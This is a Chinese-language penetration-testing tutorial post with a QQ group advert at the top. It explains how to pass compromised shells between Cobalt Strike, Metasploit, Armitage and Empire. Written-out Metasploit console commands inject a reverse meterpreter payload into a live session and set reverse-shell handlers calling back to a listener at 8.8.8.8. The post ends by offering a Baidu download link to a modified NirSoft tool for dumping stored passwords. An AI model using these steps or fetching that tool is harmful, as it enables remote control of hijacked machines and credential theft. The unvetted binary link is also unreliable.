0x000-前文
有技術交流或滲透測試培訓需求的朋友歡迎聯繫QQ547006660
2000人網絡安全交流羣,歡迎大佬們來玩
羣號820783253
0x001-Cobaltstrike與MSF會話互轉
①Metasploit派生shell給Cobaltstrike
首先,你需要拿到一個metepreter會話,本例中session爲1
Cobaltstrike的teamserver的ip爲8.8.8.8,http監聽器端口爲4555
msf exploit(handler) > use exploit/windows/local/payload_inject
msf exploit(payload_inject) > set PAYLOAD windows/meterpreter/reverse_http
msf exploit(payload_inject) > set DisablePayloadHandler true
msf exploit(payload_inject) > set LHOST 8.8.8.8.
msf exploit(payload_inject) > set LPORT 4555
msf exploit(payload_inject) > set SESSION 1
msf exploit(payload_inject) > exploit
如圖Cobaltstrike成功上線
②Cobalt strike 派生 shell 給 MSF(前提有個beacon shell)
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 8.8.8.8
lhost => 8.8.8.8
msf exploit(handler) > set lport 5555
lport => 5555
msf exploit(handler) > exploit
然後在cobaltstrike中創建一個windows/foreign/reverse_tcp Listener
,並根據metasploit監聽配置cobaltstrike的listener
選擇要派生的beacon,右鍵–>增加會話,選擇剛剛配置的foreign監聽器
MSF即可成功收到會話
0x002-Cobaltstrike與Armitage會話互轉
Cobaltstrike派生shell給Armitage
首先在armitage中配置一個handler,注意:payload要與cobaltstrike的foreign監聽器的協議相同,不然收不到會話。
同樣使用剛剛講過的cobaltstrike派生會話功能,armitage即可收到shell
Armitage派生shell給cobaltstrike
選擇armitage中的會話,右鍵,Access–>Pss Session
隨後配置相關信息爲cobaltstrike http監聽器的ip和端口
Cobaltstrike即可收到會話
0x003-Cobaltstrike與Empire會話互轉
首先如圖,在empire中配置好相關的http協議監聽器
在cobaltstrike裏面添加一個foreign監聽器,協議爲http
隨後使用cobaltstrike中講過的“增加會話”功能,選擇該http監聽器,empire即可成功收到會話。
0x004-小福利
今天分享的是神器nirsoft半漢化版,該程序在以管理員的身份運行時,可以讀取機器中各種各樣的密碼,無疑是後滲透的神器之一。
鏈接:https://pan.baidu.com/s/1Ubh-HKf-FYdUAOxL7ooAGA
提取碼:e8pz